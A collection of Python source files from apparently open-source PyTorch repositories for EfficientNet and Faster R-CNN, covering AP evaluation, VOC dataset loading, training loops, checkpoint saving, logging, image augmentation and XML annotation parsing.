print("AP: ")
for label, ap in ap_dict.items():
print(" %s: %f" % (label, ap))
print("", end="", flush=True)
@staticmethod
def _is_box_correct(pred_box, target_boxes, matched, have_detected, iou_thresh=0.5):
"""
:param pred_box: Tensor[4]
:param target_boxes: Tensor[N, 4]. all
:param matched: Tensor[NUM]
:param have_detected: Tensor[N]. bool
:param iou_thresh: int
:return: bool
"""
t_boxes = target_boxes[matched] # (NUM, 4)
if t_boxes.shape[0] == 0:
return False
iou_max, idx = torch.max(box_iou(pred_box[None], t_boxes)[0], dim=0) # (N) -> ()
if iou_max < iou_thresh:
return False
elif have_detected[matched[0][idx]]:
return False
else:
have_detected[matched[0][idx]] = True
return True
@staticmethod
def _calc_pr(pred_table, target_num):
"""calculate precision and recall
:param pred_table: List[tuple(score(float), correct(bool))]. const
:param target_num: int. const
        :return: prec_list: List[NUM], recall_list: List[NUM]
"""
pred_table = sorted(pred_table, key=lambda x: -x[0])
prec_list, recall_list = [], []
correct_num = 0
for i, (_, correct) in enumerate(pred_table):
            pred_num = i + 1  # number of predictions so far
            if correct:
                correct_num += 1  # number of correct predictions
prec_list.append(correct_num / pred_num)
recall_list.append(correct_num / target_num)
return prec_list, recall_list
@staticmethod
def _calc_ap(prec_list, recall_list):
"""prec_list, recall_list(单调递增). (recall, prec)为一个点"""
# 1. 预处理
prec_list.insert(0, 0.)
prec_list.append(0.)
recall_list.insert(0, 0.)
recall_list.append(1.)
for i in reversed(range(len(recall_list) - 1)):
prec_list[i] = max(prec_list[i], prec_list[i + 1])
        # 2. keep one point per recall value (the one with the highest precision)
idx_list = [0]
for i in range(0, len(recall_list) - 1):
if recall_list[i + 1] != recall_list[i]:
idx_list.append(i + 1)
        # 3. integrate
ap = 0.
for i in range(len(idx_list) - 1):
start = recall_list[idx_list[i]]
end = recall_list[idx_list[i + 1]]
value = prec_list[idx_list[i + 1]]
ap += (end - start) * value
return ap
```
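A toy end-to-end sketch (not in the repo) exercising APCounter; the class names, boxes, and scores below are made up.
```python
import torch

counter = APCounter(labels=["cat", "dog"], iou_thresh=0.5)
counter.init_table()
pred = {"boxes": torch.tensor([[0., 0., 10., 10.], [20., 20., 30., 30.]]),
        "labels": torch.tensor([0, 1]),
        "scores": torch.tensor([0.9, 0.8])}   # already sorted in descending order
target = {"boxes": torch.tensor([[0., 0., 10., 10.], [21., 21., 30., 30.]]),
          "labels": torch.tensor([0, 1])}
counter.add([pred], [target])
APCounter.print_ap(counter.get_ap_dict())  # both classes reach AP = 1.0 here
```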
#### File: utils/detection/my_dataset.py
```python
import torch.utils.data as tud
import os
from PIL import Image
from ..utils import load_from_pickle, save_to_pickle
from .xml_processor import XMLProcessor
from .utils import test_transforms
def get_dataset_from_pickle(root_dir, pkl_name, images_folder=None, pkl_folder=None, transforms=None):
image_fname_list, target_list = \
load_from_pickle(os.path.join(root_dir, pkl_folder or "pkl", pkl_name))
return MyDataset(root_dir, image_fname_list, target_list, images_folder, transforms)
class MyDataset(tud.Dataset):
def __init__(self, root_dir, image_fname_list, target_list, images_folder=None, transforms=None):
"""
:param root_dir: str
:param image_fname_list: List[str]
:param target_list: List[Dict]
:param images_folder: str = "JPEGImages"
        :param transforms: func(image: PIL.Image, target) -> (image: Tensor[C, H, W] RGB, target)
            default: test_transforms
"""
self.root_dir = root_dir
self.images_folder = images_folder or "JPEGImages"
assert len(image_fname_list) == len(target_list)
self.image_fname_list = image_fname_list
self.target_list = target_list
self.transforms = transforms or test_transforms
def __getitem__(self, idx):
image_fname = self.image_fname_list[idx]
target = self.target_list[idx]
images_dir = os.path.join(self.root_dir, self.images_folder)
if isinstance(idx, slice):
return self.__class__(self.root_dir, image_fname, target, self.images_folder, self.transforms)
else:
image_path = os.path.join(images_dir, image_fname)
with Image.open(image_path) as image: # type: Image.Image
image, target = self.transforms(image, target)
return image, target
def __len__(self):
return len(self.image_fname_list)
class VOC_Dataset(MyDataset):
labels_str2int = {
# Person
"person": 0,
# Animal
"bird": 1, "cat": 2, "cow": 3, "dog": 4, "horse": 5, "sheep": 6,
# Vehicle
"aeroplane": 7, "bicycle": 8, "boat": 9, "bus": 10, "car": 11, "motorbike": 12, "train": 13,
# Indoor:
"bottle": 14, "chair": 15, "diningtable": 16, "pottedplant": 17, "sofa": 18, "tvmonitor": 19
}
labels_int2str = list(labels_str2int.keys())
def __init__(self, root, year, image_set, transforms=None):
"""
        :param root: str. Directory that contains VOCdevkit
:param year: str. e.g. 0712, 2007, 2012
:param image_set: str{"train", "val", "trainval", "test"}
:param transforms: func(image: PIL.Image, target) -> (image: Tensor[C, H, W] RGB, target).
default: self._default_trans_func
"""
assert os.path.exists(root), "Please download VOC_dataset to this path"
root_dir = os.path.join(root, "VOCdevkit", "VOC%s" % year)
pkl_dir = os.path.join(root_dir, "pkl")
os.makedirs(pkl_dir, exist_ok=True)
pkl_path = os.path.join(pkl_dir, "voc_%s_%s.pkl" % (year, image_set))
if os.path.exists(pkl_path):
image_fname_list, target_list = load_from_pickle(pkl_path)
else:
xml_processor = XMLProcessor(root_dir, labels=self.labels_str2int,
image_set_path=r"./ImageSets/Main/%s.txt" % image_set)
xml_processor.parse_xmls()
xml_processor.test_dataset()
save_to_pickle((xml_processor.image_fname_list, xml_processor.target_list), pkl_path)
image_fname_list, target_list = xml_processor.image_fname_list, xml_processor.target_list
super(VOC_Dataset, self).__init__(root_dir, image_fname_list, target_list, transforms=transforms)
```
#### File: utils/detection/trainer.py
```python
from .utils import to, collate_fn
from torch.utils.data import DataLoader
import torch
class RuntimeErrorHandler:
def __init__(self, ignore_num):
self.ignore_num_ori = self.ignore_num = ignore_num
def error(self, e):
if self.ignore_num > 0:
print(e, flush=True)
self.ignore_num -= 1
else:
raise e
def init(self):
self.ignore_num = self.ignore_num_ori
class Trainer:
def __init__(self, model, optim, train_dataset, batch_size, device,
lr_scheduler=None, logger=None, checker=None, runtime_error_handler=None):
self.model = model.to(device)
self.optim = optim
self.train_loader = DataLoader(train_dataset, batch_size, True, collate_fn=collate_fn, pin_memory=True)
self.device = device
self.lr_scheduler = lr_scheduler
self.logger = logger
assert checker
self.checker = checker
self.runtime_error_handler = runtime_error_handler or RuntimeErrorHandler(ignore_num=2)
def train(self, epoch_range):
for epoch in range(*epoch_range):
self.model.train()
if self.lr_scheduler:
self.lr_scheduler.step(epoch)
lr = self.optim.param_groups[0]['lr']
self.logger.new_epoch(epoch, len(self.train_loader), lr)
for i, (x, y) in enumerate(self.train_loader):
try:
x, y = to(x, y, self.device)
loss = sum(self.model(x, y).values())
self.optim.zero_grad()
loss.backward()
self.optim.step()
if self.logger:
self.logger.step(loss.item(), i + 1)
self.runtime_error_handler.init()
except RuntimeError as e:
x, y, loss = None, None, None
torch.cuda.empty_cache()
try:
self.runtime_error_handler.error(e)
except RuntimeError as e:
self.checker.saver.save("tmp_epoch%d_step%d" % (epoch, i + 1))
raise e
if self.checker:
self.checker.step(epoch, last=(epoch == epoch_range[1] - 1))
``` |
{
"source": "Jintao-Huang/EfficientNet_PyTorch",
"score": 2
} |
#### File: EfficientNet_PyTorch/models/utils.py
```python
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
import torch
import torch.nn.functional as F
import math
def freeze_layers(model, layers):
"""冻结层"""
for name, parameter in model.named_parameters():
for layer in layers:
if layer in name: # 只要含有名字即可
parameter.requires_grad_(False)
break
else:
parameter.requires_grad_(True)
def model_info(model, img_size):
img_size = img_size if isinstance(img_size, (tuple, list)) else (img_size, img_size)
num_params = sum(x.numel() for x in model.parameters()) # number parameters
num_grads = sum(x.numel() for x in model.parameters() if x.requires_grad) # number gradients
try: # FLOPS
from thop import profile
p = next(model.parameters())
x = torch.rand((1, 3, 32, 32), dtype=p.dtype, device=p.device)
macs, num_params = profile(model, inputs=(x,), verbose=False)
flops = 2 * macs
flops_str = ", %.1f GFLOPS" % (flops * img_size[0] * img_size[1] / 32 / 32 / 1e9) # 640x640 GFLOPS
except (ImportError, Exception):
flops_str = ""
print("Model Summary: %d layers, %d parameters, %d gradients%s" %
(len(list(model.modules())), num_params, num_grads, flops_str))
def label_smoothing_cross_entropy(pred, target, smoothing: float = 0.1):
"""reference: https://github.com/seominseok0429/label-smoothing-visualization-pytorch
    :param pred: shape(N, In). Logits, before softmax
:param target: shape(N,)
:param smoothing: float
:return: shape()
"""
pred = F.log_softmax(pred, dim=-1)
ce_loss = F.nll_loss(pred, target)
smooth_loss = -torch.mean(pred)
return (1 - smoothing) * ce_loss + smoothing * smooth_loss
def cosine_annealing_lr(epoch, T_max, min_lr, max_lr):
return min_lr + (max_lr - min_lr) * (1 + math.cos(epoch / T_max * math.pi)) / 2
```
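A short sketch (not in the repo) exercising the two helpers above; the tensor shapes and schedule parameters are arbitrary.
```python
import torch

# label-smoothing loss on random logits
logits, target = torch.randn(4, 10), torch.randint(0, 10, (4,))
print(label_smoothing_cross_entropy(logits, target, smoothing=0.1).item())

# cosine annealing from 0.1 down to 0.001 over 10 epochs
for epoch in range(11):
    print(epoch, round(cosine_annealing_lr(epoch, T_max=10, min_lr=1e-3, max_lr=0.1), 5))
```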
#### File: Jintao-Huang/EfficientNet_PyTorch/train_example.py
```python
from models.efficientnet import efficientnet_b0, std_preprocess, config_dict
import torch
from utils.display import resize_pad
import numpy as np
import cv2 as cv
import torch.nn as nn
from utils.utils import processing
def pred_transform(image, target):
"""
:param image: ndarray[H, W, C] RGB
:param target: None
:return: ndarray[H, W, C] RGB 0-255, None"""
image = resize_pad(image, image_size, False, 32, False, 114)[0]
return image, target
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
efficientnet = efficientnet_b0
image_size = config_dict[efficientnet.__name__][2]
# read images
image_fname = "images/1.jpg"
x = cv.imread(image_fname, cv.IMREAD_COLOR)
x = processing(x, pred_transform)[0].to(device)[None] / 255
y_true = torch.randint(0, 2, (1,)).to(device)
model = efficientnet(pretrained=True, num_classes=2).to(device)
loss_fn = nn.CrossEntropyLoss()
optim = torch.optim.SGD(model.parameters(), 1e-3, 0.9)
for i in range(20):
pred = model(x)
loss = loss_fn(pred, y_true)
optim.zero_grad()
loss.backward()
optim.step()
print("loss: %f" % loss.item())
```
#### File: EfficientNet_PyTorch/utils/display.py
```python
import numpy as np
import cv2 as cv
from PIL import Image
import random
import math
def imwrite(image, filename):
"""cv无法读取中文字符 (CV cannot read Chinese characters)"""
    retval, arr = cv.imencode('.' + filename.rsplit('.', 1)[1], image)  # retval: whether encoding succeeded
if retval is True:
arr.tofile(filename)
return retval
def imread(filename):
"""cv无法读取中文字符 (CV cannot read Chinese characters)"""
arr = np.fromfile(filename, dtype=np.uint8)
return cv.imdecode(arr, -1)
def pil_to_cv(img):
"""转PIL.Image到cv (Turn PIL.Image to CV(BGR))
:param img: PIL.Image. RGB, RGBA, L. const
:return: ndarray. BGR, BGRA, L (H, W, C{1, 3, 4})
"""
mode = img.mode
arr = np.asarray(img)
if mode == "RGB":
arr = cv.cvtColor(arr, cv.COLOR_RGB2BGR)
elif mode == "RGBA":
arr = cv.cvtColor(arr, cv.COLOR_RGBA2BGRA)
elif mode in ("L",):
arr = arr
else:
raise ValueError("img.mode nonsupport")
return arr
def cv_to_pil(arr):
"""转cv到PIL.Image (Turn CV(BGR) to PIL.Image)
:param arr: ndarray. BGR, BGRA, L. const
:return: PIL.Image. RGB, RGBA,L
"""
if arr.ndim == 2:
pass
elif arr.ndim == 3:
arr = cv.cvtColor(arr, cv.COLOR_BGR2RGB)
else: # 4
arr = cv.cvtColor(arr, cv.COLOR_BGRA2RGBA)
return Image.fromarray(arr)
def resize_max(image, max_height=None, max_width=None):
"""将图像resize成最大不超过max_height, max_width的图像. (双线性插值)
:param image: ndarray[H, W, C]. BGR. const
:param max_width: int
:param max_height: int
:return: ndarray[H, W, C]. BGR"""
    # 1. inputs
    height0, width0 = image.shape[:2]
    max_width = max_width or width0
    max_height = max_height or height0
    # 2. algorithm
ratio = min(max_height / height0, max_width / width0)
new_shape = int(round(width0 * ratio)), int(round(height0 * ratio))
image = cv.resize(image, new_shape, interpolation=cv.INTER_LINEAR)
return image
def get_scale_pad(img_shape, new_shape, rect=True, stride=32, only_pad=False):
"""
:param img_shape: Tuple[W, H]
:param new_shape: Tuple[W, H]
    :param rect: True: rectangular (pad only to a multiple of stride), False: square
:param stride:
:param only_pad:
:return: ratio: float, new_unpad: Tuple[W, H], (pad_w, pad_h)
"""
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
ratio = 1 if only_pad else min(new_shape[0] / img_shape[0], new_shape[1] / img_shape[1])
new_unpad = int(round(img_shape[0] * ratio)), int(round(img_shape[1] * ratio)) # new image unpad shape
# Compute padding
pad_w, pad_h = new_shape[0] - new_unpad[0], new_shape[1] - new_unpad[1] # square
if rect: # detect. rect
pad_w, pad_h = pad_w % stride, pad_h % stride
pad_w, pad_h = pad_w / 2, pad_h / 2 # divide padding into 2 sides
return ratio, new_unpad, (pad_w, pad_h)
def resize_pad(img, new_shape=640, rect=True, stride=32, only_pad=False, fill_value=114):
"""copy from official yolov5 letterbox()
:param img: ndarray[H, W, C]
:param new_shape: Union[int, Tuple[W, H]]
    :param rect: bool. whether new_shape adapts to a multiple of stride (rectangular letterbox)
    :param fill_value: BGR padding color
    :param stride: int
    :param only_pad: pad only, do not resize
:return: img: ndarray[H, W, C], ratio: float, pad: Tuple[W, H]
"""
# Resize and pad image
fill_value = (fill_value, fill_value, fill_value) if isinstance(fill_value, (int, float)) else fill_value
shape = img.shape[1], img.shape[0] # Tuple[W, H]
new_shape = (new_shape, new_shape) if isinstance(new_shape, int) else new_shape
ratio, new_unpad, (pad_w, pad_h) = get_scale_pad(shape, new_shape, rect, stride, only_pad)
if ratio != 1: # resize
img = cv.resize(img, new_unpad, interpolation=cv.INTER_LINEAR)
    top, bottom = int(round(pad_h - 0.1)), int(round(pad_h + 0.1))  # avoid both sides rounding 0.5 the same way
left, right = int(round(pad_w - 0.1)), int(round(pad_w + 0.1))
img = cv.copyMakeBorder(img, top, bottom, left, right, cv.BORDER_CONSTANT, value=fill_value) # add border(grey)
    return img, ratio, (pad_w, pad_h)  # processed image, scale ratio, padding in pixels
def random_perspective(img, degrees=10, translate=.1, scale=.1, shear=10, perspective=0, fill_value=114):
"""torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
:param img: ndarray[H, W, C]. BGR
    :param degrees: rotation
    :param translate: translation
    :param scale: scaling
    :param shear: shear
    :param perspective: perspective
:return: ndarray[H, W, C]. BGR
"""
#
fill_value = (fill_value, fill_value, fill_value) if isinstance(fill_value, (int, float)) else fill_value
height, width = img.shape[:2]
# Center.
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective 透视
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale 旋转, 缩放
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear 斜切
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation 平移
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (M != np.eye(3)).any(): # image changed
if perspective:
img = cv.warpPerspective(img, M, dsize=(width, height), flags=cv.INTER_LINEAR,
borderValue=fill_value)
else: # affine
img = cv.warpAffine(img, M[:2], dsize=(width, height), flags=cv.INTER_LINEAR,
borderValue=fill_value)
return img
def random_crop(image, scale_range, fill_value=114):
"""
:param image: ndarray[H, W, C]. BGR
    :param scale_range: crop range, two values: [hw_scale_min, hw_scale_max]
:return: ndarray[H, W, C]. BGR
"""
h0, w0 = image.shape[:2]
h = int(random.uniform(scale_range[0], scale_range[1]) * h0)
w = int(random.uniform(scale_range[0], scale_range[1]) * w0)
left0, top0 = int(random.uniform(0, w0 - w)), int(random.uniform(0, h0 - h))
    left, top = (w0 - w) // 2, (h0 - h) // 2  # place the crop in the center
out = np.full_like(image, fill_value=fill_value)
out[top:top + h, left: left + w] = image[top0:top0 + h, left0: left0 + w]
return out
def augment_hsv(img, h=0.015, s=0.7, v=0.4):
"""
:param img: ndarray[H, W, C]. BGR
    :param h: hue gain
    :param s: saturation gain
    :param v: value (brightness) gain
:return:
"""
r = np.random.uniform(-1, 1, 3) * [h, s, v] + 1 # random gains
hue, sat, val = cv.split(cv.cvtColor(img, cv.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv.merge((cv.LUT(hue, lut_hue), cv.LUT(sat, lut_sat), cv.LUT(val, lut_val))).astype(dtype)
    img = cv.cvtColor(img_hsv, cv.COLOR_HSV2BGR)
return img
def draw_box(image, box, color):
"""在给定图像上绘制一个方框 (Draws a box on a given image)
:param image: shape(H, W, C) BGR. 变
:param box: len(4), (ltrb)
:param color: len(3). BGR
"""
image = np.asarray(image, np.uint8)
    box = np.asarray(box, dtype=np.int32)  # np.int is removed in newer numpy
cv.rectangle(image, (box[0], box[1]), (box[2], box[3]), color, 2, cv.LINE_4)
def draw_text(image, box, text, rect_color):
"""在图像的方框上方绘制文字 (Draw text above the box of the image)
:param image: shape(H, W, C) BGR. 变
:param box: len(4), (ltrb)
:param text: str
:param rect_color: BGR
"""
image = np.asarray(image, np.uint8)
    box = np.asarray(box, dtype=np.int32)  # np.int is removed in newer numpy
cv.rectangle(image, (box[0] - 1, box[1] - 16), (box[0] + len(text) * 9, box[1]), rect_color, -1, cv.LINE_4)
cv.putText(image, text, (box[0], box[1] - 4), cv.FONT_HERSHEY_DUPLEX, 0.5, (0, 0, 0), 1, cv.LINE_8)
def draw_target_in_image(image, boxes, labels, scores, color=(0, 252, 124)):
"""画框在image上 (draw boxes and text in image)
:param image: ndarray[H, W, C]. BGR. not const
:param boxes: ndarray[X, 4]. ltrb, 未归一化
:param labels: List[str]. Len[X].
:param scores: ndarray[X]. 从大到小排序
:param color: List -> tuple(B, G, R) # [0, 256).
:return: None
"""
boxes = np.round(boxes).astype(np.int32)
# draw
for box in boxes:
        draw_box(image, box, color=color)  # draw the box
if labels is None:
return
if scores is None:
        scores = [None] * len(labels)
    for box, label, score in reversed(list(zip(boxes, labels, scores))):  # boxes first, then text, so boxes never cover the text; iterate in reverse so higher-score text is drawn on top
text = "%s %.2f" % (label, score) if score else "%s" % label
        draw_text(image, box, text, color)  # draw the text
```
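A quick sketch (not in the repo) chaining a few of the helpers above on a dummy image; the shapes, box, label, and score are made up.
```python
import numpy as np

img = np.full((300, 500, 3), 114, dtype=np.uint8)            # dummy BGR image
img, ratio, pad = resize_pad(img, new_shape=640, rect=True, stride=32)
print(img.shape, ratio, pad)                                  # sides padded to multiples of 32
boxes = np.array([[50., 40., 200., 160.]])
draw_target_in_image(img, boxes, labels=["example"], scores=np.array([0.87]))
```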
#### File: utils/tools/checker.py
```python
import os
class Checker:
def __init__(self, test_tester_dict, saver, check_epoch, ignore_num, logger=None):
"""
:param test_tester_dict:
:param saver:
        :param check_epoch: int. Run a check every this many epochs
        :param ignore_num: int. Number of initial checks to skip
:param logger:
"""
self.test_tester_dict = test_tester_dict
self.saver = saver
self.logger = logger
self.check_epoch = check_epoch
self.ignore_num = ignore_num # ignore check_epoch
self.best_test = 0.
def step(self, epoch, last=False):
if last or epoch % self.check_epoch == self.check_epoch - 1:
if self.ignore_num > 0:
self.ignore_num -= 1
return
best_test = []
for k, test_tester in self.test_tester_dict.items():
print("----------------------------- %s" % k)
test_acc_dict = test_tester.test(last)
if self.logger:
self.logger.log_mes({"%s_acc" % k: test_acc_dict})
with open(os.path.join(self.saver.save_dir, "result.txt"), "a") as f:
f.write("%s_epoch%d_ACC: \n" % (k, epoch))
for label, acc in test_acc_dict.items():
f.write(" %s: %.4f%%\n" % (label, acc * 100))
if k.lower() == "train":
continue
test_total_acc = test_acc_dict['total_acc']
best_test.append(test_total_acc)
print("-----------------------------")
best_test = sum(best_test) / len(best_test)
if best_test >= self.best_test or last:
self.best_test = best_test
save_dir = self.saver.save_dir
if last:
fname = "model_epoch%d_test%.4f_last.pth" % (epoch, best_test)
else: # not last
fname = "model_epoch%d_test%.4f.pth" % (epoch, best_test)
                # remove stale checkpoints
for f in os.listdir(save_dir):
if f.endswith(".pth"):
path = os.path.join(save_dir, f)
print("Removed model %s..." % f, flush=True)
os.remove(path)
self.saver.save(fname)
print("Saved model %s..." % fname, flush=True)
```
#### File: utils/tools/logger.py
```python
import time
class Logger:
def __init__(self, print_steps, writer=None):
"""Notice: 需要显式的关闭writer. `writer.close()`"""
self.writer = writer
self.print_steps = print_steps
self.steps_each_epoch = None
# ----------------
self.epoch = None
self.lr = None
self.steps = None
self.loss = None
self.epoch_start_time = None
self.mini_start_time = None
def new_epoch(self, epoch, steps_each_epoch):
self.epoch = epoch
self.steps_each_epoch = steps_each_epoch
self.steps = 0
self.loss = []
self.epoch_start_time = time.time()
self.mini_start_time = time.time()
def step(self, loss, lr):
self.steps += 1
self.lr = lr
self.loss.append(loss)
if self.steps % self.print_steps == 0 or self.steps == self.steps_each_epoch:
self._print_mes(last=self.steps == self.steps_each_epoch)
if self.writer:
self.log_mes({"loss/loss": loss, **{"lr/lr%d" % i: _lr for i, _lr in enumerate(lr)}})
def log_mes(self, logs):
for key, value in logs.items():
if isinstance(value, dict):
for k, v in value.items():
if k in ("total_acc", "mean_acc"):
self.writer.add_scalar("%s_all/%s" % (key, k), v,
self.epoch * self.steps_each_epoch + self.steps)
else:
self.writer.add_scalar("%s/%s" % (key, k), v, self.epoch * self.steps_each_epoch + self.steps)
else:
self.writer.add_scalar(key, value, self.epoch * self.steps_each_epoch + self.steps)
def _print_mes(self, last=False):
loss_mean = sum(self.loss) / len(self.loss)
if last:
time_ = time.time() - self.epoch_start_time
print("Total ", end="")
else:
time_ = time.time() - self.mini_start_time
print("Train| Epoch: %d[%d/%d (%.2f%%)]| Loss: %f| Time: %.4f| LR: %s" %
(self.epoch, self.steps, self.steps_each_epoch, self.steps / self.steps_each_epoch * 100,
loss_mean, time_, ",".join(["%.4g" % _lr for _lr in self.lr])), flush=True)
self.mini_start_time = time.time()
```
#### File: utils/tools/my_dataset.py
```python
import torch.utils.data as tud
import torch
from ..utils import load_from_pickle, processing
import cv2 as cv
import numpy as np
def get_dataset_from_pickle(pkl_path, transforms=None):
img_path_list, target_list = load_from_pickle(pkl_path)
return MyDataset(img_path_list, target_list, transforms)
class MyDataset(tud.Dataset):
def __init__(self, img_path_list, target_list, transform=None):
"""
:param img_path_list: List[str]
:param target_list: List[int]
        :param transform: func(image: ndarray[H, W, C] BGR, target) -> image: ndarray[H, W, C] BGR, target
            default: self._default_trans_func
"""
assert len(img_path_list) == len(target_list)
self.img_path_list = img_path_list
self.target_list = target_list
self.transform = transform
def __getitem__(self, idx):
"""
:param idx:
:return: Tensor[C, H, W] RGB
"""
img_path = self.img_path_list[idx]
target = self.target_list[idx]
if isinstance(idx, slice):
return self.__class__(img_path, target, self.transform)
else:
x = cv.imread(img_path)
x, target = processing(x, target, self.transform)
return x, target
def __len__(self):
return len(self.img_path_list)
```
#### File: utils/tools/trainer.py
```python
import torch
from ..tools.utils import to
class Trainer:
def __init__(self, model, train_loader, loss_fn, optim, device,
lr_scheduler=None, logger=None, checker=None):
self.model = model.to(device)
self.train_loader = train_loader
self.loss_fn = loss_fn
self.optim = optim
self.device = device
self.lr_scheduler = lr_scheduler
self.logger = logger
assert checker
self.checker = checker
self.steps_each_epoch = len(self.train_loader)
def train(self, epoch_range):
for epoch in range(*epoch_range):
self.model.train()
self.logger.new_epoch(epoch, self.steps_each_epoch)
for i, (x, target) in enumerate(self.train_loader):
try:
self.lr_scheduler.step(epoch, epoch * self.steps_each_epoch + i) \
if self.lr_scheduler is not None else None
x = x / 255
x, target = to(x, target, self.device)
pred = self.model(x)
# loss = F.cross_entropy(pred, target)
loss = self.loss_fn(pred, target)
self.optim.zero_grad()
loss.backward()
self.optim.step()
self.logger.step(loss.item(), self.lr_scheduler.get_lr())
except RuntimeError as e:
torch.cuda.empty_cache()
self.checker.saver.save("tmp_epoch%d_step%d" % (epoch, i + 1))
raise e
if self.checker:
self.checker.step(epoch, last=(epoch == epoch_range[1] - 1))
```
#### File: utils/tools/utils.py
```python
def to(images, targets, device):
"""
    :param images: Tensor[N, C, H, W]
    :param targets: Tensor[N] / None
    :param device: str / device
    :return: images: Tensor[N, C, H, W], targets: Tensor[N] / None
"""
images = images.to(device)
if targets is not None:
targets = targets.to(device)
return images, targets
``` |
{
"source": "Jintao-Huang/FasterRCNN_PyTorch",
"score": 2
} |
#### File: utils/detection/xml_processor.py
```python
import os
import torch
import re
import numpy as np
import cv2 as cv
import shutil
from ..display import imread, draw_target_in_image, resize_max
from ..utils import load_from_pickle, save_to_pickle
from PIL import Image
from .utils import hflip_image
class XMLProcessor:
"""$"""
def __init__(self, root_dir, images_folder=None, annos_folder=None, pkl_folder=None,
category=None, labels_map=None, exist_ok=False):
"""
:param root_dir: str
:param images_folder: str
:param annos_folder: str
:param pkl_folder: str
        :param category: dict[str: int]. May be many-to-one
:param labels_map: dict[int: str]
"""
self.root_dir = root_dir
self.images_dir = os.path.join(root_dir, images_folder or "JPEGImages")
self.annos_dir = os.path.join(root_dir, annos_folder or "Annotations")
self.pkl_dir = os.path.join(root_dir, pkl_folder or "pkl")
os.makedirs(self.pkl_dir, exist_ok=exist_ok)
assert category and labels_map
self.category = category
self.labels_map = labels_map
self.exist_ok = exist_ok
def xmls_to_pickle(self, pkl_fname=None):
"""将xml的文件列表转为pickle
默认检查: (图片文件存在, 每张图片至少一个目标, 目标名在category中.)
:param pkl_fname: str = "images_targets.pkl".
:return: None
"""
pkl_fname = pkl_fname or "images_targets.pkl"
annos_dir = self.annos_dir
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
if not self.exist_ok and os.path.exists(pkl_path):
raise FileExistsError("%s is exists" % pkl_path)
# -----------------------------
image_fname_list = [] # len(N)
target_list = [] # len(N * dict("boxes": shape(NUMi, 4), "labels": shape(NUMi,))
xml_fname_list = os.listdir(annos_dir)
for i, xml_fname in enumerate(xml_fname_list):
image_fname, target = self._get_data_from_xml(xml_fname)
image_fname_list.append(image_fname)
target_list.append(target)
print("\r>> %d / %d" % (i + 1, len(xml_fname_list)), end="", flush=True)
print()
save_to_pickle((image_fname_list, target_list), pkl_path)
print("-------------------------------------------------")
print("Original:")
self.test_dataset(pkl_fname)
def calc_anchor_distribute(self, pkl_fname, ratios_div_lines=None, sizes_div_lines=None):
"""查看boxes的比例分布(H / W), 大小分布(size)
:param pkl_fname: str
:param ratios_div_lines: Tensor = np.linspace(0, 3, 31).'
:param sizes_div_lines: Tensor = np.array([0, 8, 16, 32, 64, 128, 256, 512, 1024])
"""
if ratios_div_lines is None:
ratios_div_lines = np.linspace(0, 3, 31)
if sizes_div_lines is None:
sizes_div_lines = np.array([0, 8, 16, 32, 64, 128, 256, 512, 1024], dtype=np.long)
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
_, target_list = load_from_pickle(pkl_path)
def get_ratio_size(box):
"""获得ratio
:param box: shape(4,). ltrb
:return: float
"""
l, t, r, b = box
w, h = r - l, b - t
return (h / w).item(), torch.sqrt(w * h).item()
def get_distribute_index(arr, x):
"""arr[idx] <= x < arr[idx + 1]"""
if x < arr[0]:
raise ValueError("x(%.2f) < arr[0](%.2f)" % (x, arr[0]))
for idx in reversed(range(len(arr))):
if x >= arr[idx]:
break
return idx
        # ----------------------------- compute the distributions
ratios_distribute = np.zeros_like(ratios_div_lines, dtype=np.long)
sizes_distribute = np.zeros_like(sizes_div_lines, dtype=np.long)
for i, target in enumerate(target_list):
for box in target["boxes"]:
ratio, size = get_ratio_size(box)
ratio_idx = get_distribute_index(ratios_div_lines, ratio)
size_idx = get_distribute_index(sizes_div_lines, size)
ratios_distribute[ratio_idx] += 1
sizes_distribute[size_idx] += 1
print("Anchor ratios distribute(floor):")
for line in ratios_div_lines:
print("%-7.2f|" % line, end="")
print()
for num in ratios_distribute:
print("%-7d|" % num, end="")
print()
print("Anchor sizes distribute(floor):")
for line in sizes_div_lines:
print("%-7d|" % line, end="")
print()
for num in sizes_distribute:
print("%-7d|" % num, end="")
print()
def test_dataset(self, pkl_fname):
"""测试pickle文件(图片存在, 输出总图片数、各个分类的目标数). 并打印检查信息
:return: None
"""
labels_map = self.labels_map
# --------------------------------
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
image_fname_list, target_list = load_from_pickle(pkl_path)
print("images数量: %d" % len(image_fname_list))
print("targets数量: %d" % len(target_list))
# 获取target各个类的数目
# 1. 初始化classes_num_dict
classes_num_dict = {label_name: 0 for label_name in labels_map.values()}
# 2. 累加
for target in target_list: # 遍历每一张图片
for label in target["labels"]:
label = label.item()
classes_num_dict[labels_map[label]] += 1
# 3. 打印
print("classes_num:")
